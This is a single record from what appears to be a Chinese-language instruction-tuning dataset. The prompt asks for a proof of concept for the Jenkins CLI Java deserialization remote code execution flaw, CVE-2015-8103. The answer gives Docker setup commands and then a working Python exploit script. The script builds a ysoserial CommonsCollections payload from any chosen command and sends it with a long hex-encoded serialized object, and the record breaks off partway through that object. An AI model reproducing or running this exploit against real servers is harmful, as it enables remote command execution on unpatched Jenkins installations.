  1031. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Send headers\n漏洞描述:1.638之前的Jenkins和1.625.2之前的LTS中的`Jenkins CLI`子系统,允许远程攻击者通过制作的序列化Java对象执行有问题的`commons-collections`。\n影响版本:``` Jenkins jenkins<= LTS 1.625.1 Jenkins jenkins<= 1.637 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【POC利用方法】\n1. Jenkins jenkins<= LTS 1.625.1\nJenkins jenkins<= 1.637\n2. $ docker pull medicean/vulapps:j_jenkins_1\n$ docker run -d -p 8080:8080 -p 50000:50000 medicean/vulapps:j_jenkins_1\n3. #! /usr/bin/env python2\n\n#Jenkins CLI RMI Java Deserialization RCE (CVE-2015-8103)\n#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)\n#Made with <3 by @byt3bl33d3r\n\nfrom __future__ import print_function\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nimport socket\nimport sys\nimport base64\nimport argparse\nimport os\nfrom subprocess import check_output\n\nysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']\nysoserial_path = None\n\nparser = argparse.ArgumentParser()\nparser.add_argument('target', type=str, help='Target IP:PORT')\nparser.add_argument('command', type=str, help='Command to run on target')\nparser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')\nparser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')\n\nif len(sys.argv) < 2:\n    parser.print_help()\n    sys.exit(1)\n\nargs = parser.parse_args()\n\nif not args.ysoserial_path:\n    for path in ysoserial_default_paths:\n        if os.path.exists(path):\n            ysoserial_path = path\nelse:\n    if os.path.exists(args.ysoserial_path):\n        ysoserial_path = args.ysoserial_path\n\nif ysoserial_path is None:\n    print(\"[-] Could not find ysoserial JAR file\")\n    sys.exit(1)\n\nif len(args.target.split(':')) != 2:\n    print('[-] Target must be in format IP:PORT')\n    sys.exit(1)\n\nif not args.command:\n    print('[-] You must specify a command to run')\n    sys.exit(1)\n\nhost, port = args.target.split(':')\n\nprint('[*] Target IP: {}'.format(host))\nprint('[*] Target PORT: {}'.format(port))\nprint('\\n')\n\nprint('[*] Retrieving the Jenkins CLI port')\n#Query Jenkins over HTTP to find what port the CLI listener is on\nr = requests.get('{}://{}:{}'.format(args.proto, host, port))\ncli_port = int(r.headers['X-Jenkins-CLI-Port'])\n\n#Open a socket to the CLI port\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_address = (host, cli_port)\nprint('[*] Connecting to Jenkins CLI on {}:{}'.format(host, cli_port))\nsock.connect(server_address)\n\n# Send headers\nheaders='\\x00\\x14\\x50\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x3a\\x43\\x4c\\x49\\x2d\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74'\nprint('[*] Sending headers')\nsock.send(headers)\n\ndata = sock.recv(1024)\nprint('[*] Received \"{}\"'.format(data))\n\nif data.find('JENKINS REMOTING CAPACITY') == -1:\n    data = sock.recv(1024)\n    print('[*] Received \"{}\"'.format(data))\n\npayloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections3', args.command])\npayload_b64 = base64.b64encode(payloadObj)\npayload='\\x3c\\x3d\\x3d\\x3d\\x5b\\x4a\\x45\\x4e\\x4b\\x49\\x4e\\x53\\x20\\x52\\x45\\x4d\\x4f\\x54\\x49\\x4e\\x47\\x20\\x43\\x41\\x50\\x41\\x43\\x49\\x54\\x59\\x5d\\x3d\\x3d\\x3d\\x3e'+payload_b64+'\\x00\\x00\\x00\\x00\\x11\\x2d\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1b\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x4c\\x00\\x10\\x63\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x50\\x72\\x6f\\x78\\x79\\x74\\x00\\x30\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x3b\\x5b\\x00\\x07\\x72\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x02\\x5b\\x42\\x4c\\x00\\x08\\x74\\x6f\\x53\\x74\\x72\\x69\\x6e\\x67\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x49\\x00\\x02\\x69\\x64\\x49\\x00\\x08\\x6c\\x61\\x73\\x74\\x49\\x6f\\x49\\x64\\x4c\\x00\\x08\\x72\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x74\\x00\\x1a\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x3b\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x09\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x41\\x74\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x3b\\x78\\x70\\x73\\x72\\x00\\x1e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x24\\x53\\x6f\\x75\\x72\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x06\\x74\\x68\\x69\\x73\\x24\\x30\\x74\\x00\\x19\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3b\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd0\\xfd\\x1f\\x3e\\x1a\\x3b\\x1c\\xc4\\x02\\x00\\x00\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\xd5\\xc6\\x35\\x27\\x39\\x77\\xb8\\xcb\\x03\\x00\\x04\\x4c\\x00\\x05\\x63\\x61\\x75\\x73\\x65\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\x3b\\x4c\\x00\\x0d\\x64\\x65\\x74\\x61\\x69\\x6c\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x71\\x00\\x7e\\x00\\x03\\x5b\\x00\\x0a\\x73\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x74\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x4c\\x00\\x14\\x73\\x75\\x70\\x70\\x72\\x65\\x73\\x73\\x65\\x64\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x73\\x74\\x00\\x10\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4c\\x69\\x73\\x74\\x3b\\x78\\x70\\x71\\x00\\x7e\\x00\\x10\\x70\\x75\\x72\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x02\\x46\\x2a\\x3c\\x3c\\xfd\\x22\\x39\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x0c\\x73\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x61\\x09\\xc5\\x9a\\x26\\x36\\xdd\\x85\\x02\\x00\\x04\\x49\\x00\\x0a\\x6c\\x69\\x6e\\x65\\x4e\\x75\\x6d\\x62\\x65\\x72\\x4c\\x00\\x0e\\x64\\x65\\x63\\x6c\\x61\\x72\\x69\\x6e\\x67\\x43\\x6c\\x61\\x73\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x08\\x66\\x69\\x6c\\x65\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x00\\x00\\x00\\x43\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x74\\x00\\x0c\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x3c\\x69\\x6e\\x69\\x74\\x3e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x32\\x71\\x00\\x7e\\x00\\x15\\x71\\x00\\x7e\\x00\\x16\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x63\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x0c\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x3c\\x74\\x00\\x1b\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x10\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x03\\x08\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x74\\x00\\x0c\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x04\\x63\\x61\\x6c\\x6c\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xfa\\x74\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x74\\x00\\x1c\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x24\\x50\\x72\\x6f\\x78\\x79\\x31\\x70\\x74\\x00\\x0f\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x74\\x00\\x15\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x52\\x65\\x6d\\x6f\\x74\\x65\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x74\\x00\\x0e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x74\\x00\\x08\\x43\\x4c\\x49\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x74\\x00\\x1f\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x19\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x07\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x74\\x00\\x05\\x5f\\x6d\\x61\\x69\\x6e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x74\\x00\\x04\\x6d\\x61\\x69\\x6e\\x73\\x72\\x00\\x26\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x4c\\x69\\x73\\x74\\xfc\\x0f\\x25\\x31\\xb5\\xec\\x8e\\x10\\x02\\x00\\x01\\x4c\\x00\\x04\\x6c\\x69\\x73\\x74\\x71\\x00\\x7e\\x00\\x0f\\x78\\x72\\x00\\x2c\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x19\\x42\\x00\\x80\\xcb\\x5e\\xf7\\x1e\\x02\\x00\\x01\\x4c\\x00\\x01\\x63\\x74\\x00\\x16\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3b\\x78\\x70\\x73\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x41\\x72\\x72\\x61\\x79\\x4c\\x69\\x73\\x74\\x78\\x81\\xd2\\x1d\\x99\\xc7\\x61\\x9d\\x03\\x00\\x01\\x49\\x00\\x04\\x73\\x69\\x7a\\x65\\x78\\x70\\x00\\x00\\x00\\x00\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x71\\x00\\x7e\\x00\\x3c\\x78\\x71\\x00\\x7e\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x70\\x73\\x7d\\x00\\x00\\x00\\x02\\x00\\x2e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x00\\x1c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x49\\x52\\x65\\x61\\x64\\x52\\x65\\x73\\x6f\\x6c\\x76\\x65\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x03\\x00\\x05\\x5a\\x00\\x14\\x61\\x75\\x74\\x6f\\x55\\x6e\\x65\\x78\\x70\\x6f\\x72\\x74\\x42\\x79\\x43\\x61\\x6c\\x6c\\x65\\x72\\x5a\\x00\\x09\\x67\\x6f\\x69\\x6e\\x67\\x48\\x6f\\x6d\\x65\\x49\\x00\\x03\\x6f\\x69\\x64\\x5a\\x00\\x09\\x75\\x73\\x65\\x72\\x50\\x72\\x6f\\x78\\x79\\x4c\\x00\\x06\\x6f\\x72\\x69\\x67\\x69\\x6e\\x71\\x00\\x7e\\x00\\x0d\\x78\\x70\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x73\\x71\\x00\\x7e\\x00\\x0b\\x71\\x00\\x7e\\x00\\x43\\x74\\x00\\x78\\x50\\x72\\x6f\\x78\\x79\\x20\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x40\\x32\\x20\\x77\\x61\\x73\\x20\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x20\\x66\\x6f\\x72\\x20\\x69\\x6e\\x74\\x65\\x72\\x66\\x61\\x63\\x65\\x20\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x75\\x71\\x00\\x7e\\x00\\x11\\x00\\x00\\x00\\x0d\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x7d\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x89\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x74\\x00\\x04\\x77\\x72\\x61\\x70\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\x6a\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x74\\x00\\x06\\x65\\x78\\x70\\x6f\\x72\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\xa6\\x74\\x00\\x21\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x74\\x00\\x16\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x4a\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x46\\x71\\x00\\x7e\\x00\\x1d\\x71\\x00\\x7e\\x00\\x1e\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x03\\x08\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x71\\x00\\x7e\\x00\\x22\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xfa\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x71\\x00\\x7e\\x00\\x26\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x71\\x00\\x7e\\x00\\x28\\x70\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x71\\x00\\x7e\\x00\\x2b\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x71\\x00\\x7e\\x00\\x30\\x71\\x00\\x7e\\x00\\x31\\x71\\x00\\x7e\\x00\\x32\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x34\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x36\\x71\\x00\\x7e\\x00\\x3a\\x78\\x78\\x75\\x72\\x00\\x02\\x5b\\x42\\xac\\xf3\\x17\\xf8\\x06\\x08\\x54\\xe0\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x07\\x46\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x24\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x04\\x49\\x00\\x03\\x6f\\x69\\x64\\x5b\\x00\\x09\\x61\\x72\\x67\\x75\\x6d\\x65\\x6e\\x74\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x05\\x74\\x79\\x70\\x65\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x77\\x08\\xff\\xff\\xff\\xfe\\x00\\x00\\x00\\x02\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x49\\x00\\x02\\x69\\x64\\x49\\x00\\x08\\x6c\\x61\\x73\\x74\\x49\\x6f\\x49\\x64\\x4c\\x00\\x08\\x72\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x74\\x00\\x1a\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x09\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x41\\x74\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x1e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x24\\x53\\x6f\\x75\\x72\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x06\\x74\\x68\\x69\\x73\\x24\\x30\\x74\\x00\\x19\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd0\\xfd\\x1f\\x3e\\x1a\\x3b\\x1c\\xc4\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\xd5\\xc6\\x35\\x27\\x39\\x77\\xb8\\xcb\\x03\\x00\\x04\\x4c\\x00\\x05\\x63\\x61\\x75\\x73\\x65\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\